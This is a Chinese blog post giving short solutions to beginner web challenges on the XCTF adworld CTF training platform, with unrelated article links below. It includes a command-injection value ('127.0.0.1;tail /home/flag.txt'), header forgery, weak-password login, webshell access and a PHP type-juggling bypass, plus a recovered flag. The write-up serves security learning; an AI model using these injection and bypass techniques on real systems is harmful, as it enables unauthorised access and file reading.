专栏首页网络攻防实战知识交流攻防世界新手练习Web writeup

攻防世界新手练习Web writeup

刷题 从简单的网站开始:

https://adworld.xctf.org.cn

0x01查看源码

curl http://111.198.29.45:31684

0x02 get_post

http://111.198.29.45:31684/?a=1 post b=2

0x03 robots

http://111.198.29.45:31688/robots.txt

f1ag_1s_h3re.php

0x04 backup

http://111.198.29.45:31689/index.php.bak

抓包:有个

Cookie: BL_D_PROV=undefined; BL_T_PROV=undefined; look-here=cookie.php

访问cookie.php 然后 查看返回的头

flag: xctf{da4630e034db74db11e85e31bd82e816}

0x06disabled_button

查看元素

删除disabled

点击 可以获得flag

0x07 simple_js

    function dechiffre(pass_enc){
        var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";
        var tab  = pass_enc.split(',');
                var tab2 = pass.split(',');var i,j,k,l=0,m,n,o,p = "";i = 0;j = tab.length;
                        k = j + (l) + (n=0);
                        n = tab2.length;
                        for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];p += String.fromCharCode((o = tab2[i]));
                                if(i == 5)break;}
                        for(i = (o=0); i < (k = j = n); i++ ){
                        o = tab[i-l];
                                if(i > 5 && i < k-1)
                                        p += String.fromCharCode((o = tab2[i]));
                        }
        p += String.fromCharCode(tab2[17]);
        pass = p;return pass;
    }
    String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));

    h = window.prompt('Enter password');
    alert( dechiffre(h) );

786OsErtk12

直接在python中
a = '\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30'
a.split(',')
b = ''
for i in a:
     b  =b+chr(int(i))
     print b

0x08 xff_referer

GET / HTTP/1.1
Host: 111.198.29.45:31727
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-Forwarded-For: 123.123.123.123
Referer: https://www.google.com
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

0x09weak_auth

username=admin&password=123456

0x10webshell

直接菜刀链接

0x11command execution

target=127.0.0.1;tail /home/flag.txt

linux读文件命令:

cat, tac, more,less,head,tail,nl,od

0x12simple_php

弱类型比较

<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){
    echo $flag1;
}
if(is_numeric($b)){
    exit();
}
if($b>1234){
    echo $flag2;
}
?> 

``` http://111.198.29.45:31755/?a=False&b=1235aaa

本文分享自微信公众号 - 无级安全(wujisec)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-04-24

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 聊聊dubbo的MonitorFilter

    dubbo-2.7.2/dubbo-monitor/dubbo-monitor-api/src/main/java/org/apache/dubbo/monit...

    codecraft
  • PHP 的 self 关键字

    PHP群里有人询问 self 关键字的用法,答案是比较明显的:静态成员函数内不能用 this 调用非成员函数,但可以用 self 调用静态成员函数/变量/常量;...

    猿哥
  • PHP 对输入变量名的自动转换的问题与源码分析

    一个简单的测试就出现了意外,一个是单个 [ 也会被替换,对于 array 的输入, key 不会做转换。于是我多多测了一下,得出如下列表:

    猿哥
  • 一个案例让你入门爬虫之二:Q房网爬虫多层页面爬取实例

    在上一篇中,我们仅仅爬取到了房源列表页面显示的房源信息,如果需要的房源信息只能在房源详情页中看到的话,就需要爬虫除了能够爬取房源列表页面,还要能够从房源列表页面...

    小Gy
  • 爬虫系列(3)初窥urllib库。

    其实就是根据URL来获取它的网页信息,虽然我们在浏览器中看到的是一幅幅优美的画面,但是其实是由浏览器解释才呈现出来的,实质它是一段HTML代码,加 JS、CSS...

    小Gy
  • Jenkins2 学习系列6 -- 环境变量

    环境变量可以被看作是pipeline与Jenkins交互的媒介。比如,可以在pipeline中通过BUILD_ NUMBER变量知道构建任务的当前构建次数。环境...

    mafeifan
  • 开源推荐 - xlswriter 1.2.5 发布,多项功能改进

    PECL主页: https://pecl.php.net/package/xlswriter

    猿哥
  • 通过PHP与Python代码对比浅析语法差异

    人工智能这几年一直都比较火,笔者一直想去学习一番;因为一直是从事PHP开发工作,对于Python接触并不算多,总是在关键时候面临着基础不牢,地动山摇的尴尬,比如...

    汤青松
  • 用Python分析许嵩的歌

    是否还记得断桥残雪,一听就是一下午 是否还记得认错,上课前必点歌曲 是否还记得素颜,同桌那清秀的脸庞

    罗罗攀
  • 一个案例让你入门爬虫之Q房网爬虫实例

    目标网站的确认,本次爬取网站为深圳Q房网( https://shenzhen.qfang.com/),要爬取的是深圳市Q房网所有二手房的信息。

    小Gy

扫码关注云+社区

领取腾讯云代金券